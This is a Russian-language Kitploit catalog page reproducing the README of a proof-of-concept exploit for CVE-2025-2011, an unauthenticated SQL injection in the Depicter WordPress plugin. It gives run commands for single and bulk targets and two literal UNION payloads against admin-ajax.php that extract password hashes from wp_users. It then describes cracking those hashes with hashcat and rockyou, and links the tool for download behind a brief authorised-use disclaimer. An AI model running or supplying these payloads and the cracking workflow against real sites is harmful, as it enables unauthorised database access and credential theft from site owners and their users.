Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-2011 — Эксплойт для CVE-2025-2011 | Kitploit
Инструменты/GitHubGitHub/x3rx3ssec/cve-2025-2011
Взлом паролейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubx3rx3ssec/cve-2025-2011

CVE-2025-2011

Эксплойт для CVE-2025-2011

Репозиторий
18 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-2011 PoC

Автор: X3RX3S, но гордо стырено Эшем Вескером, который прогнал мой код через GPT и вставил свой баннер ;) смотри тут ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 В «его» коде даже виден мой ник -_-'

Назначение: PoC-инструмент для проверки уязвимости SQL-инъекции (CVE-2025-2011) на сайтах WordPress.
Предупреждение: Используйте только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение. Несанкционированное тестирование незаконно и неэтично. Screenshot From 2025-11-02 19-44-16


Об уязвимости :)

  • Плагин The Slider & Popup Builder by Depicter для WordPress подвержен типовой SQL-инъекции через параметр ‘s' во всех версиях до 3.6.1 включительно из-за недостаточного экранирования переданного пользователем параметра и отсутствия должной подготовки существующего SQL-запроса. Это позволяет неаутентифицированным злоумышленникам добавлять дополнительные SQL-запросы к уже существующим и использовать их для извлечения конфиденциальной информации из базы данных.

Возможности

  • Два SQLi-пейлоада (выбираются с помощью -p 1 или -p 2)
  • Определение bcrypt-хешей ($2a$, $2b$, $2y$), включая варианты с префиксом $wp$
  • Результаты сохраняются для каждого хоста: results_<hostname>.txt
  • Опциональная интеграция с Hashcat для bcrypt (-m 3200) с запросом подтверждения
  • Поддержка одиночного URL (-u) или нескольких целей из файла (-f)

Требования

  • Python 3.8+
  • pip-пакеты:
    • requests
    • colorama

Установка зависимостей:

root@kitploit:~
pip install requests colorama

Опционально (для взлома):

  • hashcat установлен и доступен в вашем PATH (по умолчанию используется /usr/share/wordlists/rockyou.txt)
  • словарь, например /usr/share/wordlists/rockyou.txt

Использование

Сделать скрипт исполняемым (опционально):

root@kitploit:~
chmod +x CVE-2025-2011.py

Одиночная цель (пейлоад 1 по умолчанию):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com

Одиночная цель (пейлоад 2):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com -p 2

Несколько целей из файла (по одному URL в строке):

root@kitploit:~
python3 CVE-2025-2011.py -f targets.txt

Вывод

Для каждого протестированного хоста скрипт сохраняет файл с результатами:

root@kitploit:~
results_<hostname>.txt

Если найдены bcrypt-хеши, они сохраняются в hashes.txt, и вам будет предложено взломать их с помощью Hashcat. Пример команды Hashcat, используемой скриптом:

root@kitploit:~
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt

Примечание: bcrypt намеренно медленный. Взлом может занять очень много времени и потребовать GPU.


Пейлоады

  • Пейлоад 1 (по умолчанию):
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
  • Пейлоад 2:
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x

Правовое и ответственное использование

Этот инструмент предоставляется только в образовательных и защитных целях. Не используйте его против систем, на которые у вас нет явного разрешения. Автор и распространитель не несут ответственности за неправомерное использование. Всегда получайте письменное разрешение перед запуском тестов против целей, которыми вы не владеете.


Примечания и настройка

  • Если у вас другие словари, обновите функцию run_hashcat в скрипте, указав нужный список.
  • Если Hashcat не установлен или вы не хотите взламывать хеши, при запросе отвечайте N.
  • Для массового сканирования вы можете настроить таймауты и поведение потоков в скрипте.

Сляпано на скорую руку

  • X3RX3S
  • Вдохновлено ответственным подходом к исследованию безопасности и Chocapikk (https://github.com/Chocapikk.
Скачать инструмент